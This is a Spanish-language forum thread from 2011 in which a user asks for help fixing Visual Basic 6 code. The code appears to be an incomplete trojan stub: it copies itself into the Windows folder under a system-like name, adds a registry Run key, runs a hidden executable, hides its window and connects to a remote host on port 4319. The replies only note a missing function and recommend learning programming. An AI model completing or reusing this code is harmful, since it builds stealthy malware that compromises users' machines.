elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  problema "procedimiento sub o function no definido"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: problema "procedimiento sub o function no definido"  (Leído 6,897 veces)
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
problema "procedimiento sub o function no definido"
« en: 15 Junio 2011, 08:13 am »

Hola a todos bueno tengo este problema he modificado esta parte del código por lo que alguna parte de esta está mal, si alguien me puediera ayudar, Gracias

Código
  1. Private Sub Form_Load()
  2. On Error Resume Next
  3.  
  4.  
  5. If Dir(Environ("Windir") & "\winsetup32.exe") = vbNullString Then
  6. FileCopy App.path & "\" & App.EXEName & ".exe", Environ("Windir") & "\winsetup32.exe"
  7.  
  8. qazwsx = Environ("Windir") & "\asd.exe"
  9. edcrfv = App.Title
  10.  
  11.  
  12. zxccxz = edccde(HKEY_LOCAL_MACHINE, _
  13.                     RAMA_RUN_WINDOWS, _
  14.                     edcrfv, _
  15.                     qazwsx, REG_SZ)
  16.  
  17. End
  18. End If
  19.  
  20.    Dim ppplooo As String
  21.    ppplooo = Environ("Windir") & "\asd.exe"
  22.  
  23.    If InStr(LCase$(IsWay("asd.exe")), LCase$(ppplooo)) > 0 Then
  24.     MsgBox "Corre"
  25.     End
  26.    Else
  27.     Shell Environ("Windir") & "\asd.exe", vbHide
  28.     MsgBox "asd"
  29.    End If
  30.  
  31. App.TaskVisible = False
  32. Me.Visible = False
  33. App.Title = ""
  34. Me.Caption = ""
  35. With Winsock1
  36. .Close
  37. .Connect "asd.asd.com", 4319
  38. End With
  39. End Sub

No se nada de programación, un amigo me dijo que introdujera eso pero en verdad no logro conseguirlo


« Última modificación: 15 Junio 2011, 08:25 am por .:UND3R:. » En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
BlackZeroX
Wiki

Desconectado Desconectado

Mensajes: 3.158


I'Love...!¡.


Ver Perfil WWW
Re: problema "procedimiento sub o function no definido"
« Respuesta #1 en: 15 Junio 2011, 11:07 am »

.
No te dire que uses option explicit, ni que intentes, bueno nada, solo si gustas sigue leyendo:

Según veo y con ese trozo de código te falta el proceso  "edccde", de igual manera dinos que error te salta, y de paso lee algo básico sobre programación ( POO, programación modular, programación genérica aun que este ultimo se trabaja mucho en vb6 que digamos ), ya que lo único que deberás esperar de la ignorancia sobre el tema es que te lleguen a hablar con tecnicismos.

En conclusión o aprendes algo básico para así TRATAR de arreglar un problema X o contratas a alguien que sepa o le pides todo completo a tu amigo.

Nota: Tu problema no es el código es la ignorancia hacia una campo, como lo es mi ignorancia hacia otros campos como la Química por ejemplo.

Nos vemos seguiré viendo mi película xP.

Dulces Lunas!¡.


« Última modificación: 15 Junio 2011, 11:10 am por BlackZeroX▓▓▒▒░░ » En línea

The Dark Shadow is my passion.
raul338


Desconectado Desconectado

Mensajes: 2.633


La sonrisa es la mejor forma de afrontar las cosas


Ver Perfil WWW
Re: problema "procedimiento sub o function no definido"
« Respuesta #2 en: 15 Junio 2011, 14:31 pm »

No se nada de programación, un amigo me dijo que introdujera eso pero en verdad no logro conseguirlo
Cita de: seba123neo
Un periodista le preguntó a Einstein:
- "¿Me puede Ud. Explicar la Ley de la Relatividad?"
Y Einstein le contestó:
- "¿Me puede Ud. Explicar cómo se fríe un huevo?"
El periodista lo miró extrañado y le contesta:
- "Pues, sí, sí que puedo".
A lo cual Einstein replicó:
- "Bueno, pues hágalo, pero imaginando que yo no sé lo que es un huevo, ni una sartén, ni el aceite, ni el fuego".
(Era la firma de seba123neo)

Ese es tu problema, no sabes programar, y quieres hacer algo que implica ser algo mas que principiante en programación :P, ese código es un "mix" de otros códigos, que al parecer falta mas para continuarlo :P
Pregúntale al que lo programo, para que sirve y porque le puso esos nombres ofuscados, o leete un tutorial de programación :)
« Última modificación: 15 Junio 2011, 14:34 pm por raul338 » En línea

79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: problema "procedimiento sub o function no definido"
« Respuesta #3 en: 15 Junio 2011, 16:37 pm »

HOLA!!!

Para aprender CLICKEAME

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
.:UND3R:.
Moderador Global
***
Desconectado Desconectado

Mensajes: 3.118


Ingeniería inversa / MASM


Ver Perfil WWW
Re: problema "procedimiento sub o function no definido"
« Respuesta #4 en: 15 Junio 2011, 20:41 pm »

Bueno estoy estudiando otras cosas a lo que concierne a informática a la que le dedico casi todo el día, por lo que por eso acudí a ustedes, una ayuda más que todo, gracias por el dato black-zero
creo que lo demás comentarios están demás
Muchas gracias
En línea


Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines